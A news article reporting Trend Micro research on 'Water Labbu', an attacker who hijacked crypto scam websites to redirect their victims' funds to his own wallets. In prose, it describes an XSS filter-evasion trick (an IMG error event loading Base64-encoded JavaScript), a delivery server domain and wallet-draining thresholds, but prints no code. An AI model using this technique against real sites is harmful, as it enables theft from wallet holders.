News

Scammers in the cryptocurrency space are fighting over stolen assets

 

Researchers in the field of cybersecurity have found a hacker who was responsible for hacking cryptocurrency fraud websites and redirecting cash that had already been stolen to his own wallets. This hacker had previously raked in hundreds of thousands of dollars via this scheme.

According to Trend Micro, a threat actor going by the name “Water Labbu” discovered and penetrated 45 scam websites, then substituted the wallet addresses of the victims with his own. In this manner, whatever money that the con artists manage to mislead other individuals into sending them will ultimately end up in his possession.

The majority of the sites are just bogus mining pools for liquidity. In order to generate a liquidity pool, legitimate cryptocurrency mining pools require their users to lend their digital assets to decentralized exchanges. This allows the pool to operate. Due to the existence of this liquidity pool, cryptocurrency traders are now able to trade their tokens directly (in a decentralized manner, as opposed to a centralized manner where a single entity provides the liquidity). Receiving a cut of the trading fees allows the lenders to generate a profit for themselves.

Users are required to connect their wallets to the liquidity mining pool before they may lend out their cryptocurrency holdings. Fake websites, on the other hand, do little more than wait for users to link their wallets before emptying them out completely. There is a significant amount of work to be done, including the creation of bogus apps as well as participation in social media activities to promote fraud. Water Labbu sidesteps all of it, allowing the original con artists to carry out all of the laborious work on their behalf.

“In one of the examples we investigated, Water Labbu manipulated an IMG element to load a Base64- encoded JavaScript payload via the “error event,” Trend Micro’s study noted.

This is what is known as an XSS evasion method, and it is used to get over Cross-Site Scripting (XSS) filters. The injected payload will then generate another script element, which will load yet another script from the delivery server located at tmpmeta.com.

The script searches for new wallets that have a balance of at least 0.005 ETH or 22,000 USDT, and then, depending on the platform (Windows or one of the two mobile devices), it either performs the transfer or begins the search again.

Trend Micro reminds users that in order to protect themselves from these types of fraud, users should be very careful while linking their wallets and should ensure that they have done their research before handing up any of their tokens.

 

Read:

 

Sponsored
Fizza Akbar

Share
Published by
Fizza Akbar
Tags: crypto scam

Recent Posts

VPN Ban Could Cost Pakistan’s IT Industry $1 Billion, Warns P@SHA

The Pakistan Software Houses Association (P@SHA) has raised alarms about the severe impact of the…

10 hours ago

WhatsApp Trials Group Chat Mentions in the Latest Status Update Feature

WhatsApp is rolling out a new feature in its latest Android beta version, allowing users…

10 hours ago

PTA Chairman Confirms No Orders for Mobile Service Shutdown

ISLAMABAD: Chairman of the Pakistan Telecommunication Authority (PTA), Major General (retd) Hafeez-ur-Rehman, confirmed that no…

11 hours ago

35,000 Students to Receive Free Laptops Under Punjab Government Scheme

Punjab Chief Minister Maryam Nawaz Sharif has announced the launch of a new initiative aimed…

11 hours ago

Meta Introduces New Features to Messenger: AI Backgrounds, HD Video Calls, and More

Meta has unveiled a set of new features for Facebook Messenger, designed to improve call…

13 hours ago

PTA Seeks Stakeholder Input on VPN Registration

Islamabad (21st November 2024): PTA hosted a stakeholder consultation on VPN registration, with key participants…

14 hours ago